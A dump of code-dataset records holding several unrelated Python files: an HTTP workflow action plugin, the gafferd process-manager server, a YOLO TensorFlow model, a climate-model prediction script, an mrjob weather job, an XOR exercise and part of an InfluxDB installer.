allow_redirects,\n \"proxies\": proxies,\n \"verify\": verify,\n }\n ses.sesPush(session, dic)\n self.ts_ses_end = time.time()\n\n self.orgInit(\n url,\n method,\n params,\n body,\n headers,\n cookies,\n auth,\n timeout,\n allow_redirects,\n proxies,\n verify,\n )\n klog.d()\n self.ts_init_end = time.time()\n\n def orgRun(self, context):\n LOG.info(\n \"Running HTTP action \"\n \"[url=%s, method=%s, params=%s, body=%s, headers=%s,\"\n \" cookies=%s, auth=%s, timeout=%s, allow_redirects=%s,\"\n \" proxies=%s, verify=%s]\",\n self.url,\n self.method,\n self.params,\n self.body,\n self.headers,\n self.cookies,\n self.auth,\n self.timeout,\n self.allow_redirects,\n self.proxies,\n self.verify\n )\n\n try:\n resp = requests.request(\n self.method,\n self.url,\n params=self.params,\n data=self.body,\n headers=self.headers,\n cookies=self.cookies,\n auth=self.auth,\n timeout=self.timeout,\n allow_redirects=self.allow_redirects,\n proxies=self.proxies,\n verify=self.verify\n )\n except Exception as e:\n raise exc.ActionException(\"Failed to send HTTP request: %s\" % e)\n\n LOG.info(\n \"HTTP action response:\\n%s\\n%s\",\n resp.status_code,\n resp.content\n )\n\n # TODO(akuznetsova): Need to refactor Mistral serialiser and\n # deserializer to have an ability to pass needed encoding and work\n # with it. Now it can process only default 'utf-8' encoding.\n # Appropriate bug #1676411 was created.\n\n # Represent important resp data as a dictionary.\n try:\n content = resp.json(encoding=resp.encoding)\n except Exception as e:\n LOG.debug(\"HTTP action response is not json.\")\n content = resp.content\n if content and resp.encoding != 'utf-8':\n content = content.decode(resp.encoding).encode('utf-8')\n\n _result = {\n 'content': content,\n 'status': resp.status_code,\n 'headers': dict(resp.headers.items()),\n 'url': resp.url,\n 'history': resp.history,\n 'encoding': resp.encoding,\n 'reason': resp.reason,\n 'cookies': dict(resp.cookies.items()),\n 'elapsed': resp.elapsed.total_seconds()\n }\n\n if resp.status_code not in range(200, 307):\n return actions.Result(error=_result)\n\n return _result\n\n def run(self, context):\n self.ts_run_start = time.time()\n\n if not self.skipRun:\n # TODO: replace input with self.rrInput\n # if self.rrInput:\n # pass\n\n klog.d(varfmt(self))\n # klog.d(varfmt(context))\n klog.d(\">>> Run action\")\n res = self.orgRun(context)\n\n klog.d(\"<<< Run action\")\n klog.d(varfmt(res))\n try:\n _input = todict(self)\n except:\n _input = None\n try:\n _output = todict(res)\n except:\n _output = None\n\n kfk_trace.log(kfk_etypes.TASK_ACTION, self.atom, \"RUNNING\",\n self.workflow_name, self.workflow_execution_id,\n self.task_id, self.task_name,\n _input, _output, None)\n\n else:\n klog.d(\"YIHE.Sync.run skipped\")\n\n # TODO: replace output with self.rrOutput\n if self.rrOutput:\n pass\n\n self.ts_run_end = time.time()\n\n klog.d(\"TIME: Init total: \", self.ts_init_end - self.ts_init_start)\n klog.d(\"TIME: Run total: \", self.ts_run_end - self.ts_run_start)\n klog.d(\"TIME: Action Total: \", self.ts_run_end - self.ts_init_start)\n if self.ts_ses_end:\n klog.d(\"TIME: Session Total: \", self.ts_ses_end - self.ts_ses_start)\n\n return res\n\n\nclass Async(Sync):\n def __init__(self,\n action_context,\n url,\n method=\"GET\",\n params=None,\n body=None,\n atom=None,\n session=None,\n headers=None,\n cookies=None,\n auth=None,\n timeout=None,\n allow_redirects=None,\n proxies=None,\n verify=None):\n\n actx = action_context\n\n ck_url = actx.get('callback_url')\n if conf.EUREKA_ENABLE:\n host = eureka.get_app_url(conf.APP_NAME_CALLBACK)\n ck_url = host + ck_url\n klog.d(\"Eureka enable, CK_URL:\", ck_url)\n\n headers = headers or {}\n headers.update({\n 'Workflow-Name': actx.get('workflow_name'),\n 'Workflow-Execution-Id': actx.get('workflow_execution_id'),\n 'Task-Id': actx.get('task_id'),\n 'Action-Execution-Id': actx.get('action_execution_id'),\n 'Callback-URL': ck_url,\n })\n\n super(Async, self).__init__(\n action_context,\n url,\n method,\n params,\n body,\n atom,\n session,\n headers,\n cookies,\n auth,\n timeout,\n allow_redirects,\n proxies,\n verify,\n )\n\n def is_sync(self):\n return False\n\n def test(self, context):\n return None\n\n# vim: sw=4 ts=4 sts=4 ai et\n","sub_path":"yhmistral/plugin/yeehaw_action.py","file_name":"yeehaw_action.py","file_ext":"py","file_size_in_byte":11673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"184695669","text":"# -*- coding: utf-8 -\n#\n# This file is part of gaffer. See the NOTICE for more information.\n\nimport argparse\nimport fnmatch\ntry:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\nimport os\nimport sys\n\nimport six\n\nfrom ..console_output import ConsoleOutput\nfrom ..http_handler import HttpHandler, HttpEndpoint\nfrom ..manager import Manager\nfrom ..pidfile import Pidfile\nfrom ..sig_handler import SigHandler\nfrom ..state import FlappingInfo\nfrom ..util import daemonize, setproctitle_\nfrom ..webhooks import WebHooks\n\nfrom .plugins import PluginManager\nfrom .util import user_path\n\nENDPOINT_DEFAULTS = dict(\n uri = None,\n backlog = 128,\n ssl_options = {})\n\nPROCESS_DEFAULTS = dict(\n group = None,\n args = None,\n env = {},\n uid = None,\n gid = None,\n cwd = None,\n detach = False,\n shell = False,\n os_env = True,\n numprocesses = 1,\n start = True,\n priority = six.MAXSIZE)\n\nclass DefaultConfigParser(configparser.ConfigParser):\n \"\"\" object overriding ConfigParser to return defaults values instead\n of raising an error if needed \"\"\"\n\n def dget(self, section, option, default=None):\n if not self.has_option(section, option):\n return default\n return self.get(section, option)\n\n def dgetint(self, section, option, default=None):\n if not self.has_option(section, option):\n return default\n return self.getint(section, option)\n\n def dgetboolean(self, section, option, default=None):\n if not self.has_option(section, option):\n return default\n return self.getboolean(section, option)\n\n\nclass Server(object):\n \"\"\" Server object used for gafferd \"\"\"\n\n def __init__(self, args):\n self.args = args\n self.cfg = None\n\n config_file = args.config or args.config_file\n if not config_file:\n self.set_defaults()\n else:\n self.parse_config(config_file)\n\n self.manager = Manager()\n self.plugin_manager = PluginManager(self.plugins_dir)\n\n def default_endpoint(self):\n params = ENDPOINT_DEFAULTS.copy()\n\n if self.args.backlog:\n params['backlog'] = self.args.backlog\n\n if self.args.certfile:\n params['ssl_options']['certfile'] = self.args.certfile\n\n if self.args.keyfile:\n params['ssl_options']['keyfile'] = self.args.keyfile\n\n if not params['ssl_options']:\n del params['ssl_options']\n\n params['uri'] = self.args.bind or '127.0.0.1:5000'\n return HttpEndpoint(**params)\n\n def set_defaults(self):\n self.plugins_dir = self.args.plugins_dir\n self.webhooks = []\n self.endpoints = [self.default_endpoint()]\n self.processes = []\n\n def run(self):\n # check if any plugin dependancy is missing\n self.plugin_manager.check_mandatory()\n\n # setup the http api\n static_sites = self.plugin_manager.get_sites()\n http_handler = HttpHandler(endpoints=self.endpoints,\n handlers=static_sites)\n\n # setup gaffer apps\n apps = [SigHandler(),\n WebHooks(hooks=self.webhooks),\n http_handler]\n\n # extend with plugin apps\n plugin_apps = self.plugin_manager.get_apps(self.cfg)\n apps.extend(plugin_apps)\n\n # verbose mode\n if self.args.verboseful:\n apps.append(ConsoleOutput(actions=['.']))\n elif self.args.verbose:\n apps.append(ConsoleOutput(output_streams=False,\n actions=['.']))\n\n self.manager.start(apps=apps)\n\n # add processes\n for name, cmd, params in self.processes:\n self.manager.add_process(name, cmd, **params)\n\n # run the main loop\n self.manager.run()\n\n def read_config(self, config_path):\n cfg = DefaultConfigParser()\n with open(config_path) as f:\n cfg.readfp(f)\n cfg_files_read = [config_path]\n\n # load included config files\n includes = []\n for include_file in cfg.dget('gaffer', 'include', '').split():\n includes.append(include_file)\n\n for include_dir in cfg.dget('gaffer', 'include_dir', '').split():\n for root, dirnames, filenames in os.walk(include_dir):\n for filename in fnmatch.filter(filenames, '*.ini'):\n cfg_file = os.path.join(root, filename)\n includes.append(cfg_file)\n\n cfg_files_read.extend(cfg.read(includes))\n\n return cfg, cfg_files_read\n\n def parse_config(self, config_file):\n cfg, cfg_files_read = self.read_config(config_file)\n self.cfg = cfg\n\n self.plugins_dir = cfg.dget('gaffer', 'plugins_dir',\n self.args.plugins_dir)\n\n # you can setup multiple endpoints in the config\n endpoints_str = cfg.dget('gaffer', 'http_endpoints', '')\n endpoints_names = endpoints_str.split(\",\")\n\n endpoints = []\n processes = []\n webhooks = []\n envs = {}\n for section in cfg.sections():\n if section.startswith('endpoint:'):\n name = section.split(\"endpoint:\", 1)[1]\n if name in endpoints_names:\n kwargs = ENDPOINT_DEFAULTS.copy()\n\n for key, val in cfg.items(section):\n if key == \"bind\":\n kwargs['uri'] = val\n elif key == \"backlog\":\n kwargs = cfg.dgetint(section, key, 128)\n elif key == \"certfile\":\n kwargs['ssl_options'][key] = val\n elif key == \"keyfile\":\n kwargs['ssl_options'][key] = val\n\n if not kwargs['ssl_options']:\n kwargs['ssl_options'] = None\n if kwargs.get('uri') is not None:\n endpoints.append(HttpEndpoint(**kwargs))\n elif section.startswith('process:'):\n name = section.split(\"process:\", 1)[1]\n cmd = cfg.dget(section, 'cmd', '')\n if cmd:\n params = PROCESS_DEFAULTS.copy()\n for key, val in cfg.items(section):\n if key == \"args\":\n params[key] = val\n elif key.startswith('env:'):\n envname = key.split(\"env:\", 1)[1]\n params['env'][envname] = val\n elif key == 'uid':\n params[key] = val\n elif key == 'gid':\n params[key] = val\n elif key == 'cwd':\n params[key] = val\n elif key == 'detach':\n params[key] = cfg.dgetboolean(section, key,\n False)\n elif key == 'shell':\n params[key] = cfg.dgetboolean(section, key,\n False)\n elif key == 'os_env':\n params[key] = cfg.dgetboolean(section, key,\n True)\n elif key == 'numprocesses':\n params[key] = cfg.dgetint(section, key, 1)\n elif key == 'start':\n params[key] = cfg.dgetboolean(section, key,\n True)\n elif key == 'flapping':\n # flapping values are passed in order on one\n # line\n values_str = val.split(None)\n try:\n values = [float(val) for val in values_str]\n params['flapping'] = FlappingInfo(*values)\n except ValueError:\n pass\n elif key == \"redirect_output\":\n params[key] = [v.strip() for v in val.split(\",\")]\n elif key == \"redirect_input\":\n params[key] = cfg.dgetboolean(section, key,\n False)\n elif key == \"graceful_timeout\":\n params[key] = cfg.dgetint(section, key, 10)\n elif key == \"priority\":\n params[key] = cfg.dgetint(section, key,\n six.MAXSIZE)\n\n processes.append((name, cmd, params))\n elif section == \"webhooks\":\n for key, val in cfg.items(section):\n webhooks.append((key, val))\n elif section.startswith('env:'):\n pname = section.split(\"env:\", 1)[1]\n kvs = [(key.upper(), val) for key, val in cfg.items(section)]\n envs[pname] = dict(kvs)\n\n # add environment variables\n for name, cmd, params in processes:\n if name in envs:\n params['env'] = envs[name]\n\n # sort processes by priority\n processes = sorted(processes, key=lambda p: p[2]['priority'])\n\n if not endpoints:\n # we create a default endpoint\n endpoints = [self.default_endpoint()]\n\n self.endpoints = endpoints\n self.webhooks = webhooks\n self.processes = processes\n\ndef run():\n # default plugins dir\n plugins_dir = os.path.join(user_path(), \"plugins\")\n\n # define the argument parser\n parser = argparse.ArgumentParser(description='Run some watchers.')\n parser.add_argument('config', help='configuration file',\n nargs='?')\n\n parser.add_argument('-c', '--config', dest='config_file',\n help='configuration file')\n parser.add_argument('-p', '--plugins-dir', dest='plugins_dir',\n help=\"default plugin dir\", default=plugins_dir),\n\n parser.add_argument('-v', dest='verbose', action='store_true',\n help=\"verbose mode\")\n parser.add_argument('-vv', dest='verboseful', action='store_true',\n help=\"like verbose mode but output stream too\")\n parser.add_argument('--daemon', dest='daemonize', action='store_true',\n help=\"Start gaffer in the background\")\n parser.add_argument('--pidfile', dest='pidfile')\n parser.add_argument('--bind', dest='bind',\n default='127.0.0.1:5000', help=\"default HTTP binding\"),\n parser.add_argument('--certfile', dest='certfile',\n help=\"SSL certificate file for the default binding\"),\n parser.add_argument('--keyfile', dest='keyfile',\n help=\"SSL key file for the default binding\"),\n parser.add_argument('--backlog', dest='backlog', type=int,\n default=128, help=\"default backlog\"),\n\n args = parser.parse_args()\n\n if args.daemonize:\n daemonize()\n\n setproctitle_(\"gafferd\")\n\n pidfile = None\n if args.pidfile:\n pidfile = Pidfile(args.pidfile)\n\n try:\n pidfile.create(os.getpid())\n except RuntimeError as e:\n print(str(e))\n sys.exit(1)\n\n s = Server(args)\n\n try:\n s.run()\n except KeyboardInterrupt:\n pass\n finally:\n if pidfile is not None:\n pidfile.unlink()\n\n sys.exit(0)\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"gaffer/node/gafferd.py","file_name":"gafferd.py","file_ext":"py","file_size_in_byte":11520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309671506","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Author : IslandLiu\n# Date : 19-2-21\n\n\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport os\nimport config as cfg\nfrom utils import tf_utils, calculate_iou\n\n\ndef get_model(images):\n \"\"\"\n Build YOLO net\n :param images: 4-D tensor [cfg.BATCH_SIZE, image_height, image_width, channel]\n :return:\n predicts: 4-D tensor [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, num_classes + 5 * cfg.BOXES_PER_CELL]\n \"\"\"\n cfg.BATCH_SIZE = images.get_shape()[0].value\n net = tf_utils.conv2d(inputs=images,\n num_output_channels=64,\n kernel_size=[7, 7],\n scope='conv',\n stride=(2, 2))\n net = tf_utils.max_pool2d(inputs=net,\n kernel_size=[2, 2],\n scope='max_pool',\n stride=[2, 2])\n net = tf_utils.conv2d(inputs=net,\n num_output_channels=192,\n kernel_size=[3, 3],\n scope='conv',\n stride=(1, 1))\n\n net = tf_utils.max_pool2d(inputs=net,\n kernel_size=(2, 2),\n scope='max_pool',\n stride=(2, 2))\n net = tf_utils.conv2d(net, 128, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 256, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 256, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 512, (3, 3), scope='conv')\n\n net = tf_utils.max_pool2d(net, (2, 2), scope='max_pool')\n\n for i in range(4):\n net = tf_utils.conv2d(net, 256, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 512, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 512, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.max_pool2d(net, (2, 2), scope='max_pool')\n\n for i in range(2):\n net = tf_utils.conv2d(net, 512, (1, 1), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n net = tf_utils.conv2d(net, 1024, (3, 3), scope='conv')\n\n # Fully connected layer\n net = tf.reshape(net, [cfg.BATCH_SIZE, -1])\n net = tf_utils.fully_connected(net, 4096, scope='fc')\n net = tf.nn.dropout(net, keep_prob=0.5)\n net = tf_utils.fully_connected(net, 7 * 7 * 30, scope='fc')\n predicts = tf.reshape(net, [cfg.BATCH_SIZE, 7, 7, 30])\n\n return predicts\n\n\ndef get_loss(predicts, labels):\n \"\"\"\n Calculate loss\n :param predicts: 4-D tensor [cfg.BATCH_SIZE, 7, 7, 30]\n :param labels: 4-D tensor [cfg.BATCH_SIZE, 7, 7 25]\n :return:loss\n \"\"\"\n # [bs, 7, 7, 0:2]为预测的置信度 -> [bs, 7, 7, 2]\n predicts_confidence = predicts[..., 0:cfg.BOXES_PER_CELL],\n # [bs, 7, 7, 2:10]为预测的bounding_box的坐标 -> [bs, 7, 7, 2, 4]\n predicts_boxes = tf.reshape(predicts[..., cfg.BOXES_PER_CELL:(5 * cfg.BOXES_PER_CELL)],\n [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, cfg.BOXES_PER_CELL, 4])\n # [bs, 7, 7, 10:]为预测的class的概率值 -> [bs, 7, 7, 20]\n predicts_class = predicts[..., (5 * cfg.BOXES_PER_CELL):]\n\n # 标签置信度[bs, 7, 7, 1]\n labels_confidence = tf.reshape(labels[..., 0], (cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, 1))\n # 标签bounding_box,因为只有一个,形如[bs, 7, 7, 1, 4], 所以利用tf.tile(), 变为[bs, 7, 7, 2, 4]\n labels_boxes = tf.reshape(labels[..., 1:5],\n [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, 1, 4])\n labels_boxes = tf.tile(labels_boxes, [1, 1, 1, 2, 1])\n # 标签的class [bs, 7, 7, 20]\n labels_class = labels[..., 5:]\n\n # predicts_boxes中的值是经过归一化处理的,所以要还原\n # offset最后的形如[bs, 7, 7, 2]\n offset = np.reshape(np.array([np.arange(cfg.CELL_SIZE)] * cfg.CELL_SIZE * cfg.BOXES_PER_CELL), [2, 7, 7])\n offset = np.transpose(offset, (1, 2, 0))\n offset = tf.cast(offset, dtype=tf.float32)\n offset = tf.reshape(offset, [1, cfg.CELL_SIZE, cfg.CELL_SIZE, cfg.BOXES_PER_CELL])\n offset_x = tf.tile(offset, [cfg.BATCH_SIZE, 1, 1, 1])\n offset_y = tf.transpose(offset_x, (0, 2, 1, 3))\n predicts_boxes_tran = tf.stack([(predicts_boxes[..., 0] + offset_x) * cfg.IMAGE_SIZE / cfg.CELL_SIZE,\n (predicts_boxes[..., 1] + offset_y) * cfg.IMAGE_SIZE / cfg.CELL_SIZE,\n tf.square(predicts_boxes[..., 2] * cfg.IMAGE_SIZE),\n tf.square(predicts_boxes[..., 3] * cfg.IMAGE_SIZE)], axis=-1)\n\n # calculate iou (shape[cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, cfg.BOXES_PER_CELL]\n iou = calculate_iou.cal_iou(predicts_boxes_tran, labels_boxes)\n\n # create mask\n object_mask = tf.reduce_max(iou, axis=3, keepdims=True)\n object_mask = tf.cast((iou >= object_mask), tf.float32) * labels_confidence\n\n no_object_mask = tf.ones_like(object_mask, dtype=tf.float32) - object_mask\n\n # normalize the label_boxes\n labels_boxes_nor = tf.stack([labels_boxes[:, :, :, :, 0] * cfg.CELL_SIZE / cfg.IMAGE_SIZE - offset_x,\n labels_boxes[:, :, :, :, 1] * cfg.CELL_SIZE / cfg.IMAGE_SIZE - offset_y,\n tf.sqrt(labels_boxes[:, :, :, :, 2] / cfg.IMAGE_SIZE),\n tf.sqrt(labels_boxes[:, :, :, :, 3] / cfg.IMAGE_SIZE)], axis=-1)\n # calculate loss\n # class loss (tensor shape [cfg.BATCH_SIZE, cfg.CELL_SIZE, cfg.CELL_SIZE, classes_num])\n class_delta = (predicts_class - labels_class) * labels_confidence\n class_loss = tf.reduce_mean(tf.reduce_sum(tf.square(class_delta), axis=[1, 2, 3]), name='class_loss')\n # object_loss\n object_delta = (predicts_confidence - iou) * object_mask\n object_loss = tf.reduce_mean(tf.reduce_sum(tf.square(object_delta), axis=[1, 2, 3]), name='object_loss')\n object_loss = cfg.OBJECTS_SCALE * object_loss\n # no_object_loss\n no_object_delta = (predicts_confidence - iou) * no_object_mask\n no_object_loss = tf.reduce_mean(tf.reduce_sum(tf.square(no_object_delta), axis=[1, 2, 3]), name='nonobject_loss')\n no_object_loss = cfg.NO_OBJECTS_SCALE * no_object_loss\n # coordinate loss\n coord_mask = tf.expand_dims(object_mask, axis=4)\n coord_delta = (predicts_boxes - labels_boxes_nor) * coord_mask\n coord_loss = tf.reduce_mean(tf.reduce_sum(coord_delta, axis=[1, 2, 3, 4]), name='coor_loss')\n coord_loss = cfg.COORDS_SCALE * coord_loss\n\n tf.losses.add_loss(class_loss)\n tf.losses.add_loss(object_loss)\n tf.losses.add_loss(no_object_loss)\n tf.losses.add_loss(coord_loss)\n\n tf.summary.scalar('class_loss', class_loss)\n tf.summary.scalar('object_loss', object_loss)\n tf.summary.scalar('no_object_loss', no_object_loss)\n tf.summary.scalar('coord_loss', coord_loss)\n\n # tf.summary.histogram('iou', iou)\n\n total_loss = tf.losses.get_total_loss()\n return total_loss\n\n\nif __name__ == '__main__':\n with tf.Graph().as_default():\n inputs = tf.random_normal(shape=(45, 448, 448, 3))\n labels = tf.ones((45, 7, 7, 25))\n outputs = get_model(inputs)\n loss = get_loss(outputs, labels)\n init_op = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init_op)\n sess.run(outputs)\n total_losses = sess.run(loss)\n\n print(outputs)\n print(total_losses)\n","sub_path":"models/yolo_net.py","file_name":"yolo_net.py","file_ext":"py","file_size_in_byte":7682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"360626315","text":"# set random seeds\nimport numpy as np\nnp.random.seed(0)\nfrom tensorflow import set_random_seed\nset_random_seed(0)\n\nimport os\nimport sys\nimport argparse\nsys.path.append('../')\nsys.path.append('../../../')\n\nfrom cbrain.data_generator import *\nfrom cbrain.losses import *\nfrom cbrain.layers import *\nfrom cbrain.cam_constants import *\n\nfrom utils import build_directory\nfrom cbrain.utils import limit_mem\nfrom stored_dictionaries.data_options import data_opts\nfrom tensorflow.keras.models import *\n\nparser = argparse.ArgumentParser()\n# python3.6 predict.py --loss_type mse --net_type normal --data 8col --model_path\n# ---------------- Important parameters -------------------------\nparser.add_argument('--loss_type', type=str, default='mse', choices=['mse', 'weak_loss'], help='What to run?')\nparser.add_argument('--net_type', type=str, default='normal', choices=['normal', 'conservation'], help='What to run?')\nparser.add_argument('--data', type=str, choices=['fluxbypass_aqua', 'land_data', '8col', '32col'])\nparser.add_argument('--model_path', type=str)\nparser.add_argument('--alg', type=str, default='')\n\n# params okay left as defaults\nparser.add_argument('--batch_size', type=int, default=2048, help='Batch size')\nparser.add_argument('--data_dir', type=str, default='/baldig/chemistry/earth_system_science/')\nparser.add_argument('--patience', type=int, default=10, help='How long to wait for an improvement')\n\nFLAGS = parser.parse_args()\n\n# Otherwise tensorflow will use ALL your GPU RAM for no reason\nlimit_mem()\noutput_path = '{data_dir}{data}/{net_type}_{loss_type}/'.format(\n data_dir=FLAGS.data_dir,\n data=FLAGS.data,\n net_type=FLAGS.net_type,\n loss_type=FLAGS.loss_type,\n alg=FLAGS.alg\n); build_directory(output_path)\n\nif FLAGS.data == 'fluxbypass_aqua':\n PREFIX = '8col009_01_'\n DATADIR = FLAGS.data_dir + FLAGS.data + '/'\n\n scale_dict = load_pickle(DATADIR + '009_Wm2_scaling.pkl'); in_vars = load_pickle(DATADIR + '009_Wm2_in_vars.pkl')\n out_vars = load_pickle(DATADIR + '009_Wm2_out_vars.pkl'); dP = load_pickle(DATADIR + '009_Wm2_dP.pkl')\n\n valid_gen = DataGenerator(\n data_fn = DATADIR+PREFIX+'valid.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = DATADIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict,\n batch_size=FLAGS.batch_size,\n shuffle=False\n )\nelse:\n from data_generator import DataGenerator\n\n valid_gen = DataGenerator(\n data_dir=FLAGS.data_dir + FLAGS.data + '/',\n feature_fn=data_opts[FLAGS.data]['test']['feature_fn'],\n target_fn=data_opts[FLAGS.data]['test']['target_fn'],\n batch_size=FLAGS.batch_size,\n norm_fn=data_opts[FLAGS.data]['norm_fn'],\n fsub='feature_means',\n fdiv='feature_stds',\n tmult='target_conv',\n shuffle=False,\n )\n\n # load weights from h5 file\n model = load_model(FLAGS.model_path)\n\n trial_num = FLAGS.model_path.split('/')[-1].replace('.h5','')\n\n print('Trial Num:', trial_num)\n\n predictions = model.predict_generator(\n valid_gen.return_generator(),\n steps=valid_gen.n_batches,\n workers=16,\n max_queue_size=50,\n )\n\n # rescale predictions\n predictions = (predictions/valid_gen.target_norms[1]) + valid_gen.target_norms[0]\n\n # save predictions to path\n np.savez(output_path + 'predictions_{}.npz'.format(trial_num), predictions=predictions)\n","sub_path":"notebooks/tbeucler_devlog/hp_opt_conservation/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"623918401","text":"#!/usr/bin/python\nimport sys\nsys.path.append('/usr/lib/python2.6/dist-packages')\nimport re,pickle,base64,zlib\nfrom mrjob.job import MRJob\nfrom sys import stderr\nimport pandas as pd\nimport numpy as np\nimport sklearn as sk\nimport gzip\nimport pickle\n\nf = gzip.open('ML_station_hash.pkl.gz', 'rb' )\npickleFile = pickle.Unpickler(f)\nhashtable = pickleFile.load()\nf.close()\n\nclass split_weather(MRJob): \n \n def mapper_pre(self, _, line):\n global hashtable\n elements = line.split(',')\n if elements[1] == 'TMAX' or elements[1] == 'TMIN':\n region = hashtable.get(elements[0])\n if region != None:\n yield (elements[0], elements[2], region), (elements[1], elements[3:])\n \n def reducer_pre(self, station_pair, weathers):\n weather_max = []\n weather_min = []\n valid_count = 0\n data_count = 0\n for weather in weathers:\n if weather[0] == 'TMAX': weather_max = weather[1]\n if weather[0] == 'TMIN': weather_min = weather[1]\n data_count += 1\n if data_count == 2 and len(weather_max) == 365 and len(weather_min) == 365:\n for i in range(365):\n if weather_max[i] != '' and weather_min[i] != '':\n valid_count += 1\n if valid_count >= 180:\n weather_data = weather_max + weather_min\n yield station_pair[2], weather_data\n \n def reducer_split(self, region, matrixs):\n for matrix in matrixs:\n yield (region, matrix)\n \n def steps(self):\n return [self.mr(mapper = self.mapper_pre, reducer=self.reducer_pre),\n self.mr(reducer = self.reducer_split)]\n \nif __name__ == '__main__':\n split_weather.run()","sub_path":"notebooks/weather.mapreduce/split_ML.py","file_name":"split_ML.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"250203674","text":"'''\n You are given an array A[] , you have to construct a new array A2[].\nThe values in A2[] are obtained by doing Xor of consecutive elements in array.\n\nInput:\nFirst line of the input contains t, the number of test cases. Each line of the test case contains a number n specifying the number of elements.\n Each 'n' lines denoting elements of array A[].\n\nOutput:\nEach new line of the output contains element of array A2[] .\n\n \n\nConstraints:\n\n1<=t<=100\n\n1<=n<=100000\n\n1<=A[i]<=100000\n\nExample:\n\nSample Input 0\n1\n5\n10 11 1 2 3\n\nSample Output 0\n1 10 3 1 3\n'''\n\nfor _ in range(int(input())):\n n=int(input())\n arr=list(map(int,input().split()))\n for i in range(n-1):\n val=arr[i]^arr[i+1]\n print(val,end=\" \")\n print(arr[n-1])","sub_path":"Geeks For Geeks/Arrays/gameWithNumbers.py","file_name":"gameWithNumbers.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"550638595","text":"#########\n# Copyright (c) 2017 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport json\nfrom os.path import join\n\nfrom .. import (\n SOURCES,\n SERVICE_USER,\n SERVICE_GROUP,\n CONFIG,\n ENDPOINT_IP,\n)\n\nfrom ..service_names import INFLUXDB\n\nfrom ... import constants\nfrom ...config import config\nfrom ...logger import get_logger\nfrom ...exceptions import ValidationError, BootstrapError\n\nfrom ...utils import common\nfrom ...utils.systemd import systemd\nfrom ...utils.install import yum_install, yum_remove\nfrom ...utils.network import wait_for_port, check_http_response\nfrom ...utils.files import copy_notice, remove_notice, remove_files, temp_copy\n\nlogger = get_logger(INFLUXDB)\n\n# Currently, cannot be changed due to webui not allowing to configure it.\nINFLUXDB_ENDPOINT_PORT = 8086\n\nHOME_DIR = join('/opt', INFLUXDB)\nLOG_DIR = join(constants.BASE_LOG_DIR, INFLUXDB)\nINIT_D_PATH = join('/etc', 'init.d', INFLUXDB)\nCONFIG_PATH = join(constants.COMPONENTS_DIR, INFLUXDB, CONFIG)\n\n\ndef _configure_database(host, port):\n db_user = \"root\"\n db_pass = \"root\"\n db_name = \"cloudify\"\n\n logger.info('Creating InfluxDB Database...')\n\n # the below request is equivalent to running:\n # curl -S -s \"http://localhost:8086/db?u=root&p=root\" '-d \"{\\\"name\\\": \\\"cloudify\\\"}\" # NOQA\n import urllib\n import urllib2\n import ast\n\n endpoint_for_list = 'http://{0}:{1}/db'.format(host, port)\n endpoint_for_creation = ('http://{0}:{1}/cluster/database_configs/'\n '{2}'.format(host, port, db_name))\n params = urllib.urlencode(dict(u=db_user, p=db_pass))\n url_for_list = endpoint_for_list + '?' + params\n url_for_creation = endpoint_for_creation + '?' + params\n\n # check if db already exists\n db_list = eval(urllib2.urlopen(urllib2.Request(url_for_list)).read())\n try:\n assert not any(d.get('name') == db_name for d in db_list)\n except AssertionError:\n logger.info('Database {0} already exists!'.format(db_name))\n return\n\n try:\n tmp_path = temp_copy(join(CONFIG_PATH, 'retention.json'))\n\n with open(tmp_path) as policy_file:\n retention_policy = policy_file.read()\n logger.debug(\n 'Using retention policy: \\n{0}'.format(retention_policy))\n data = json.dumps(ast.literal_eval(retention_policy))\n logger.debug('Using retention policy: \\n{0}'.format(data))\n content_length = len(data)\n request = urllib2.Request(url_for_creation, data, {\n 'Content-Type': 'application/json',\n 'Content-Length': content_length})\n logger.debug('Request is: {0}'.format(request))\n request_reader = urllib2.urlopen(request)\n response = request_reader.read()\n logger.debug('Response: 